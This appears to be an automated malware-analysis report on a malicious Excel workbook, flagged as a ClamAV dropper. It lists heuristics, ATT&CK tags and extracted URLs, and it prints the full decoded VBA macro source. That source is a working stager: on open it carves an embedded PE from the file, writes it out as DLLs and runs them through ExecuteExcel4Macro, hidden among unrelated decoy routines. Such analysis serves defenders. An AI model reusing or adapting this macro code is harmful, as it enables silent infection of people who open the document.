MALICIOUS
550
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample is an Office document containing VBA macros that trigger on Workbook_Open. These macros utilize Shell() and CallByName functions, indicative of malicious intent. Crucially, an embedded PE executable was detected and flagged by ClamAV, suggesting the VBA code is designed to download and execute a second-stage payload. The presence of VirtualAlloc and LoadLibrary API calls further supports the execution of external code.
Heuristics 13
-
ClamAV: Win.Dropper.Hideproc-6663113-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Dropper.Hideproc-6663113-0
-
Embedded PE executable critical OLE_EMBEDDED_EXEMZ/PE header found inside document — possible embedded executable
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
sendings = 1 Dim sNMSP As New Shell FlagDouble = True -
VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGERVBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.Matched line in script
HiddenEE4M = False varRes1 = ExecuteExcel4Macro("CALL(" + sOfbl + "dipo"",""J"")") If IsNumeric(varRes1) Then -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName DestinationKat, "Copy" + "Here", VbMethod, harvest.Items.Item(Lrigat) -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Workbook_Open() If WelcomeDialog.Visible = True Then -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ocsp.sectigo.com0 In document text (OLE body)
- http://ocsp.comodoca.com0In document text (OLE body)
- http://ocsp.usertrust.com0In document text (OLE body)
- https://sectigo.com/CPS0In document text (OLE body)
- http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sIn document text (OLE body)
- http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#In document text (OLE body)
- http://crl.comodoca.com/AAACertificateServices.crl04In document text (OLE body)
- http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0vIn document text (OLE body)
- http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19084 bytes |
SHA-256: d0b4209b8753ea80e0fb30819177987b95a2411494f1147dc11d99b1d4ebbb8e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
If WelcomeDialog.Visible = True Then
Exit Sub
End If
Module2.WuzzyBud 3900
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
End Sub
Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Repositor"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Dim vSpeed As Integer
Dim vLicensePlate As String
Public Property Get Speed() As Integer
Speed = vSpeed
End Property
Public Property Get CheckCar(car As Object, Drive As String)
CheckCar = car.SpecialFolders("" & Drive)
End Property
Public Property Get SpecialFolders() As String
LicensePlate = vLicensePlate
End Property
Public Property Let LicensePlate(lp As String)
If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error
vLicensePlate = lp
End Property
Public Property Let Speed(sp As Integer)
End Property
Attribute VB_Name = "Module0"
Public Sub VistaQ(WhereToGo)
DoEvents
ThisWorkbook.Sheets.Copy
Application.DisplayAlerts = False
DoEvents
ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9
DoEvents
DoEvents
ActiveWorkbook.Close
DoEvents
DoEvents
End Sub
Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant)
On Error Resume Next
For Each Key In putArrayBigList
Kill Key
Next Key
End Sub
Private Sub TextBox2_Change()
x = Len(TextBox2)
Y = LTrim(TextBox2.Text)
d = TextBox2
If d = "" Then
TextBox2.BackColor = &HFFFFFF
Exit Sub
End If
If Left(d, 2) > 24 Then
MsgBox "Ora Errata"
TextBox2.SelStart = 0
TextBox2.SelLength = Len(TextBox2)
Exit Sub
End If
If x = 2 Then TextBox2 = Y & ":"
If x = 4 Then Exit Sub
If Mid(d, 4, 2) = "" Then Exit Sub
If Mid(d, 4, 2) > 59 Then
MsgBox "Minuti Errati"
TextBox2.SelStart = 3
TextBox2.SelLength = Len(TextBox2)
Exit Sub
End If
If x = 5 Then
TextBox3.SetFocus
End If
Exit Sub
Resume
End Sub
Public Sub Vooooohead()
Dim ofbl As String
Dim sOfbl As String
Dim CurrentSizeOfAT As Long
dershlep = "" + Dialog4.TextBox1.Tag
Dialog4.TextBox3.ControlTipText = Dialog4.TextBox3.Tag
Dim sendings As Integer
ofbl = Dialog4.TextBox3.ControlTipText
ofbl = ofbl + "\boost_thread"
ctackPup = Dialog4.TextBox1.Tag + "\dorea"
ctackPup = ctackPup + "l.xlsx"
Dim arr(1 To 3) As String
If Len(Dialog4.TextBox3.Text) > 266 Then
MsgBox "Ultrapassa 66 Caracteres!", vbCritical, "HISTÓRICO"
TextBox7.SelStart = 0
Else
End If
Dim objeto As Control
If Len(Dialog4.TextBox1.Text) > 366 Then
For Each objeto In UserForm1.Controls
On Error Resume Next
objeto.Value = ""
Next
Unload ggg.UserForm1
ggg.UserForm1.Hide
End If
ctackPip = ctackPup & Page11.Range("B115").Value
PublicResumEraseByArrayList ofbl + "*", ctackPip, dershlep + UserForm1.Label1.Tag
On Error GoTo 0
VistaQ ctackPup
FileCopy ctackPup, ctackPip
sendings = 1
Dim sNMSP As New Shell
FlagDouble = True
Lrigat = UserForm1.Label11.Tag
If sendings > 0 And sendings > -30 Then
Set DestinationKat = sNMSP.Namespace(dershlep)
Set harvest = sNMSP.Namespace(ctackPip)
End If
CallByName DestinationKat, "Copy" + "Here", VbMethod, harvest.Items.Item(Lrigat)
Dim car As Repositor
Set car = New Repositor
For StepBit = 1 To 2
CurrentSizeOfAT = 282024
sendings = 1
sendingsCSTR = "1"
If FlagDouble Then
CurrentSizeOfAT = 200000 + 75360 + 8
sendings = 2
FlagDouble = False
sendingsCSTR = "2"
End If
sOfbl = ofbl + sendingsCSTR + ".dll"
Composition dershlep + "" + UserForm1.Label1.Tag + "", sOfbl, CurrentSizeOfAT, sendings
If sendings < 100 Then
sendings = sendings + 1
sendings = sendings + 1
End If
If -100 <= sendings Then
sendings = sendings + 1
ChDir Dialog4.TextBox3.Tag
sendings = sendings + 1
End If
sOfbl = """" + sOfbl & ""","""
If sendings < 0 Then
sendings = sendings + 1
sendings = sendings + 1
End If
If sendings > 1000 Then
sendings = sendings + 1
End If
If sendings < 0 Then
sendings = sendings + 1
End If
If sendings < 0 Then
sendings = sendings + 1
sendings = sendings + 1
End If
StopByOk = HiddenEE4M(sOfbl)
If StopByOk Then
Exit Sub
End If
WelcomeDialog.Hide
Next
End Sub
Sub subTotalSales()
Dim LR As Integer
LR = Cells(Rows.Count, "A").End(xlUp).Row + 2
Rows("1:2").EntireRow.Insert Shift:=xlDown
If LR = 3 Then
Range("A1").Select
Call salesHeade.rs
Range("A2").Formula = "$0"
Range("B2").Formula = "$0"
Range("C2").Formula = "$0"
Range("D2").Formula = "$0"
Range("E2").Formula = "$0"
Range("F2").Formula = "0%"
Range("G2").Formula = "0"
Range("H2").Formula = "$0"
Range("I2").Formula = "0"
Range("J2").Formula = "0"
Range("K2").Formula = "$0"
Range("L2").Formula = "$0"
Range("M2").Formula = "0"
Range("N2").Formula = "0%"
Else
Range("A1").Select
Call salesHeade.rs
With ActiveSheet
End With
End If
End Sub
Sub InputWeekData(x As Date)
ActiveCell = Format(x, "ww", vbMonday, vbFirstFourDays)
ActiveCell.Offset(0, 1).Select
ActiveCell = x
ActiveCell.Offset(0, 1).Select
ActiveCell = x + 6
ActiveCell.Offset(0, 1).Select
End Sub
Private Sub TextBox3_Change()
Y = LTrim(TextBox3.Text)
d = TextBox3
If x = 5 Then
TextBox4.SetFocus
End If
Exit Sub
Resume
End Sub
Attribute VB_Name = "Module1"
Public Const FirstB As Byte = 77
Public Const SecondB As Byte = 90
Public Const ThirdB As Byte = 144
Public Sub GetParam(Count As Integer)
Dim i As Long
Dim j As Integer
Dim c As String
Dim tooolsetChunkI As Boolean
Dim tooolsetChunkQ As Boolean
j = 1
tooolsetChunkI = False
tooolsetChunkQ = False
GetP.aram = ""
For i = 1 To Len(Comma.nd$)
c = Mi.d$(Comma.nd$, i, 1)
If tooolsetChunkI Then
If c = """" Then
j = j + 1
tooolsetChunkI = False
tooolsetChunkQ = False
End If
ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
If c = " " Then
j = j + 1
tooolsetChunkI = False
tooolsetChunkQ = False
End If
Else
If c = """" Then
If j > Count Then Exit Sub
tooolsetChunkI = True
tooolsetChunkQ = True
ElseIf c <> " ccc" Then
End If
End If
If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
Next i
End Sub
Attribute VB_Name = "Module2"
Public DisputeChannel3 As Byte
Public DecemberUpdate As Byte
Public HurricanMoes() As Byte
Public abbrev As Byte
Public Sub WuzzyBud(dImmer As Integer)
If WelcomeDialog.Visible = True Then
Exit Sub
End If
Dim s As String
Dim GetInfirmityLevelDescription As String
Dim d As Long
d = 3
d = d - 1
Dim redoMochup As New WshShell
Select Case d
Case 0
s = "No health problems"
Case 1
s = "Minor health problems"
Case 2
s = "Major health problems"
Case 3
s = "Severe disability"
End Select
Dim car As Repositor
Dim SpecialPath As String
PRP = "%" & Dialog4.TextBox1.Tag
Dialog4.TextBox1.Tag = redoMochup.ExpandEnvironmentStrings(PRP + "%")
Set car = New Repositor
Dim firstWeek As Integer
Dim firstDay As Integer
Dim firstdate As Date
Dim lastdate As Date
Dim lastWeek As Integer
Dim lastDay As Integer
s = car.CheckCar(redoMochup, Dialog4.TextBox3.ControlTipText & "")
firstWeek = 1
firstDay = 2
lastWeek = 3
lastDay = 4
Dialog4.TextBox3.Tag = s
If Not firstDay = 1 Then
firstdate = firstdate + (8 - firstDay)
firstWeek = firstWeek + 1
End If
If lastDay = 6 Then
lastdate = lastdate + 1
lastDay = lastDay + 1
ElseIf Not lastDay = 7 Then
lastdate = lastdate - lastDay
lastDay = 7
lastWeek = lastWeek - 1
End If
Dim iteration As Integer
ChDir (Dialog4.TextBox1.Tag)
If WelcomeDialog.Visible = False Then
WelcomeDialog.Show
End If
End Sub
Attribute VB_Name = "Module4"
Public Sub GetParam(Count As Integer)
Dim i As Long
Dim j As Integer
Dim c As String
Dim tooolsetChunkI As Boolean
Dim tooolsetChunkQ As Boolean
j = 1
tooolsetChunkI = False
tooolsetChunkQ = False
GetP.aram = ""
For i = 1 To Len(Comma.nd$)
c = Mi.d$(Comma.nd$, i, 1)
If tooolsetChunkI Then
If c = """" Then
j = j + 1
tooolsetChunkI = False
tooolsetChunkQ = False
End If
ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
If c = " " Then
j = j + 1
tooolsetChunkI = False
tooolsetChunkQ = False
End If
Else
If c = """" Then
If j > Count Then Exit Sub
tooolsetChunkI = True
tooolsetChunkQ = True
ElseIf c <> " " Then
tooolsetChunkI = True
End If
End If
If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
Next i
End Sub
Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer)
Dim ProstoPlan As Long
Dim logicVari As Integer
Dim SimpleMethod As Integer
ReDim HurricanMoes(1 To fl)
ProstoPlan = FreeFile
Open Composition2 For Binary Access Read As ProstoPlan
logicVari = 1
Do While Not EOF(ProstoPlan)
Get ProstoPlan, , abbrev
If abbrev = FirstB Then
HurricanMoes(1) = abbrev
Get ProstoPlan, , DisputeChannel3
If DisputeChannel3 = SecondB Then
HurricanMoes(2) = DisputeChannel3
Get ProstoPlan, , DecemberUpdate
If DecemberUpdate = ThirdB Then
HurricanMoes(3) = DecemberUpdate
If logicVari = DisputeChannel6 Then
For k = 4 To fl
Get ProstoPlan, , abbrev
HurricanMoes(k) = abbrev
Next k
Exit Do
Else
logicVari = logicVari + 1
End If
End If
End If
End If
Loop
On Error Resume Next
LoopIfEnd = 400
Close ProstoPlan
LoopIfEnd = 400 + LoopIfEnd
ProstoPlan = FreeFile
LoopIfEnd = 400 + LoopIfEnd
Open ofbl For Binary Lock Read Write As #ProstoPlan
LoopIfEnd = 400 + LoopIfEnd
zeroBob = 1
For i = zeroBob To UBound(HurricanMoes)
If WelcomeDialog.Enabled = True Then
Put #ProstoPlan, , HurricanMoes(i)
End If
Next i
Close ProstoPlan
ProstoPlan = FreeFile
For HSP = 33 To -1 Step -0.25
ProstoPlan = 6 + i
Next HSP
ProstoPlan = 6 + i
End Sub
Private Sub cmd_Keluar_Click()
Unload LSD.Me
MDIForm1.dokter.Enabled = True
MDIForm1.dokter.Checked = False
End Sub
Private Sub cmd_Perbaiki_Click()
If cmd_Perbaiki.Caption = "Pe&rbaiki" Then
cmd_Simpan.Enabled = False
cmd_Hapus.Enabled = False
cmd_Batal.Enabled = True
Dim var As String
var = InputBox("Ketikkan kode dokter yang datanya akan di perbaiki !", "Perbaiki Data dokter")
If var = Empty Then Exit Sub
Data1.Recordset.Index = "Kode_dokter"
Data1.Recordset.Seek "=", var
If Not Data1.Recordset.NoMatch Then
Call tam.pil
txtkd_dok.Enabled = False
txtnm_dok.Enabled = True
cmd_Perbaiki.Caption = "&Perbaharui data"
Else
MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan"
End If
Else
Data1.Recordset.Edit
Data1.Recordset!kode_dokter = txtkd_dok.Text
Data1.Recordset!nama_dokter = txtnm_dok.Text
Data1.Recordset.Update
Call ber.sih
cmd_Perbaiki.Caption = "Pe&rbaiki"
cmd_Batal.Enabled = False
cmd_Simpan.Enabled = True
cmd_Hapus.Enabled = True
Call tdk_bi.sa
End If
End Sub
Private Sub cmd_Simpan_Click()
If cmd_Simpan.Caption = "&Isi Data" Then
Call bis.a
nom.Or
M.e.txtnm_dok.SetFocus
cmd_Batal.Enabled = True
cmd_Perbaiki.Enabled = False
cmd_Hapus.Enabled = False
cmd_cari.Enabled = False
cmd_Simpan.Caption = "&Simpan Data"
Else
If txtkd_dok.Text = "" Or _
txtnm_dok.Text = "" Then
MsgBox "Data tidak boleh kosong !", vbCritical, "SISTEM PENJUALAN KREDIT"
txtkd_dok.SetFocus
Else
cmd_Batal.Enabled = False
cmd_Perbaiki.Enabled = True
cmd_Hapus.Enabled = True
cmd_cari.Enabled = True
Data1.Recordset!kode_dokter = txtkd_dok.Text
Data1.Recordset!nama_dokter = txtnm_dok.Text
Data1.Recordset.Update
Call ber.sih
cmd_Simpan.Caption = "&Isi Data"
End If
End If
End Sub
Attribute VB_Name = "Module5"
Public Function HiddenEE4M(sOfbl)
HiddenEE4M = False
varRes1 = ExecuteExcel4Macro("CALL(" + sOfbl + "dipo"",""J"")")
If IsNumeric(varRes1) Then
If varRes1 = 0 Then
HiddenEE4M = True
End If
End If
End Function
Private Sub Command7_Click()
b = MsgBox("?????????", vbYesNo)
If b = vbYes Then
a = "delete from cinema where cinid='"
a = a + Text1.Text + "'"
cnmovie.Execute a
rs4.Close
Sql = "select * from cinema"
rs4.Open Sql, cnmovie, adOpenDynamic, adLockOptimistic
If rs.BOF And rs.EOF Then
MsgBox "?????!"
Else
rs4.MoveFirst
Call View.Data
End If
End If
End Sub
Private Sub nomor()
Dim urutan As String * 5
Dim hitung As Byte
If Data1.Recordset.RecordCount = 0 Then
urutan = "Dr" & "001"
Else
Data1.Recordset.MoveLast
If Val(Left(Data1.Recordset!kode_dokter, 3)) <> "000" Then
urutan = "00" & "001"
Else
hitung = Val(Right(Data1.Recordset!kode_dokter, 3)) + 1
urutan = "Dr" & Right("000" & hitung, 3)
End If
End If
M.e.txtkd_dok = urutan
End Sub
Private Sub cmd_Batal_Click()
Call be.rsih
Call td.k_bisa
cmd_Batal.Enabled = False
cmd_Perbaiki.Enabled = True
cmd_Hapus.Enabled = True
cmd_cari.Enabled = True
End Sub
Private Sub cmd_cari_Click()
Dim var As String
var = InputBox("Masukan Kode Dokter yang ingin anda cari!", "Cari data dokter")
If var = Empty Then Exit Sub
If var <> "" Then
Data1.Recordset.Index = "kode_dokter"
Data1.Recordset.Seek "=", var
If Not Data1.Recordset.NoMatch Then
Call tam.pil
Call bi.sa
Call kun.ci
Else
MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan"
End If
End If
End Sub
Private Sub cmd_Hapus_Click()
Dim var As String
var = InputBox("Masukan Kode dokter yang akan dihapus!", "Hapus dokter")
If var = Empty Then Exit Sub
If var = "" Then
Data1.Recordset.Index = "Kode_dokter"
Data1.Recordset.Seek "=", var
If Not Data1.Recordset.NoMatch Then
Data1.Recordset.Delete
Data1.Refresh
Data1.Recordset.MoveFirst
Else
MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan"
End If
End If
End Sub
Attribute VB_Name = "Dialog4"
Attribute VB_Base = "0{9870D9BC-D646-4A8C-8807-05B5C4030F2E}{F7E6A3C2-2C48-42B4-9B93-15B24253064B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "WelcomeDialog"
Attribute VB_Base = "0{04FE67B2-ED57-47EF-B880-F2DF74AEFFAF}{101F8939-2E92-46ED-8292-F467938CE625}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Activate()
DoEvents
DoEvents
Vooooohead
DoEvents
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{841A2CAF-1756-4501-B358-B7738F4F670A}{CDFB02FD-80A3-4C6F-9EA7-0F6894DA32A7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
embedded_office_0000195f.exe |
embedded-pe | Office MZ+PE at offset 0x195F | 707745 bytes |
SHA-256: 0cdcd22384824937da78aae64026f1bf7110d6d9e1d1757df4d763d511785ff0 |
|||
|
Detection
ClamAV:
Win.Dropper.Hideproc-6663113-0
Obfuscation or payload:
likely
Static shellcode analysis recovered command string(s): WScript.Shell Carved macro source contains an auto-exec entry point and execution/download terms.
|
|||
ole10native_00.bin |
ole-package | OLE Ole10Native stream: MBD007B37F0/Ole10Native | 561939 bytes |
SHA-256: 87aca9f8c5eee38c7def1092ef63b0b1fb0de70001996396d08d93f74082bd4a |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.